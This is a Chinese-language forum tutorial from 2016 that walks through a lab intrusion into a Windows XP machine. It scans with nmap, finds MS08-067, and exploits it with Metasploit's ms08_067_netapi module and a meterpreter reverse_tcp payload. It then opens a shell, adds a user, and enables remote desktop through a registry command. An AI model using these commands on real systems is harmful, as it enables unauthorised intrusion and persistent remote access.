HanDs
NO.2

nmap结合metasploit入侵Xp 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

很久之前写的一片文章 首发在博客  又在i春秋论坛 发了 可惜 后来博客受到攻击 数据 没保存  幸运的是i春秋论坛有人将我的帖子 保存下来了 在这里 感谢下那位小伙伴

这个ip 192.168.159.140就是我们此次渗透测试的目标

在kali上打开终端输入ifconfig查看一下本机的ip地址


然后打开我们的msf 来调用nmap来扫描  输入命令 nmap  -sC 192.168.159.140   (ps:这条命令的功能主要是搜集各种应用服务的信息) 如图 开启了smtp服务  这样我们你可以通过nmap来爆破 当然这次我们不讲这个爆破


从扫描结果 我们可以得知开启 了 135 139 445这些非常 危险的端口 并且探测出目标主机的系统是xp

nmap -script=smb-check-vulns.nse 192.168.159.140  然后我们用nmap的一个漏洞扫描脚本来扫描主机 (ps:不得不感叹nmap确实强大)

如图出现了一个非常危险且著名的漏洞 就是 MS08-067远程溢出漏洞

终于轮到我们的msf登场了  我们输入命令search ms08_067 来搜索这个漏洞利用模块 (ps: search  就是搜索的意思) 显然 我们已经搜索到了就是这个 exploit/windows/smb/ms08_067_netapi

use  exploit/windows/smb/ms08_067_netapi  来调用这个模块 (ps: use就是使用的意思)

如图 我们先用set payload windows/meterpreter/reverse_tcp命令设置相应的shellcode
set RHOST 192.168.159.140目标主机的ip
set LHOST 192.168.159.129 本机ip用来监听
exploit!开始溢出  如图 已经建立了一个会话

 

然后输入shell进入 xp的命令行模式
进去之后 最重要的 还是提权 这次提权非常简单 也就是建立个用户的过程 大家看图就行 在这就不解释了

 

因为我们用nmap扫描的时候 并没有开启3389端口  所以我们在输入REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 这个命令开启
我们在打开 redesktop这个 kali自带的远程桌面连接软件

 


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
nmap 结合 metasploit 入侵 Xp
#1楼
发帖时间:2016-8-3   |   查看数:0   |   回复数:0
游客组